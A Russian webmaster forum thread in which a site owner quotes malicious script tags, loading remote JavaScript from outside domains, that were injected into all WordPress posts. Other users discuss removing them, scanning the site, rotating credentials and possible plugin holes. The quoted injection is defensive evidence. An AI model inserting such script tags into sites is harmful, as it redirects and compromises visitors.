- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Залили в wp_posts post_content во все записи скрипт:
<strong>Эoзинофилы</strong> — бeлые кровяные клетки, присутствующие в местаx протекания аллергичeских реaкций, при инвазии пaразитичeскими чeрвями и участвующие в реaкцияx, вызываeмыx некоторыми лекaрствами.<script src='https://js.garrygudini.com/stats.js?l=p&' type='text/javascript'></script><script src='https://js.garrygudini.com/stats.js?l=p&' type='text/javascript'></script><script src='https://letsmakesomechoice.com/stats.js?l=p&' type='text/javascript'></script><script src='https://letsmakesomechoice.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script>
Подскажите, как для начала вырезать его со всех постов, а потом понять как его залили.
бeлые кровяные клетки, присутствующие в местаx протекания аллергичeских реaкций, при инвазии пaразитичeскими чeрвями и участвующие в реaкцияx, вызываeмыx некоторыми лекaрствами
Редкостная чушь.
Подскажите, как для начала вырезать его со всех постов, а потом понять как его залили.
Мне нужно срочно удалить редиректы, на сайте статьи со ссылками с миралинкса, вэбмастера жалобы пишут в ТП. Потом можно будет смотреть на бэкапе.
Какой лучше плагин, раньше никогда с такими не сталкивался.
---------- Добавлено 29.05.2019 в 23:16 ----------
Удалил код плагином и сразу такой вопрос.
Можно как-то запретить запись в БД, оставив только чтение?
Можно как-то запретить запись в БД, оставив только чтение?
Нужно не вентиляцию заколачивать, а от дыр избавляться.
Пароль на БД смените в конфиг файле
Это прелестно :)
А чё- поломать сайт - нормальный выход. :)
И ты что, серьёзно полагаешь что кто-то коннектиться к базе напрямую? И наверное через ПМА изменяют контент? :)
Скачайте сайт, проверьте айболитом, ну и этим сервисом https://www.virustotal.com/gui/home/upload
Меняйте все пароли.
Дальше по результатам проверки чистите и наблюдайте за сайтом.
adminer обычно он называется
Всё понятно..
Тяжелый случай :)
И ты что, серьёзно полагаешь что кто-то коннектиться к базе напрямую?
Конвейерные взломщики - нет. Индивидуальные - сколько угодно.
280-350 кб. файл
Да там не конвеерная работа. Через SQL инжект залить такой объем текста да еще со скриптами и html разметкой не реал - тупо часть символов порежет.
Конвейерный взлом !== SQL инжект. Там тоже скрипты.
Суть не в этом. Массовые взломы обычно лечатся чисткой сайта и закрытием дыры, для индивидуальных же этого недостаточно. Там действительно необходимо менять доступы к БД.
И да, между прочим. Через SQL инжект текст никто не заливает вообще, ни малый объём, ни большой. Слышал звон, да не знаешь, где он. (С)
Конвейерные взломщики - нет. Индивидуальные - сколько угодно.
Индивидуальные - капля в океане по сравнению с конвейерными :) (начиная с "дорогое удовольствие" и заканчивая "гафик не нужно, т.к. есть 100500 других доступных сайтов").
Кроме того в большинстве случаев либо так не прокатит (ибо есть запрет подключений с левых IP) либо уже имеют доступ к файлам, а значит и к чтению конфига. Так что смена доступов к базе - тупейшая мера "безопасности" (можно применить разве только после реализации всех остальных мер).
Yuzo Related Posts не стоит? Wordpress обновляли вовремя? Сайты изолированы?
Если все это выполнено, то на вскидку не сказать в чем причина. Используйте ai-bolit для чистки от залитого кода, ну и если контента не много, то руками или попробуйте Wordfence Security. А так sql запросами, но тут главное не ошибаться.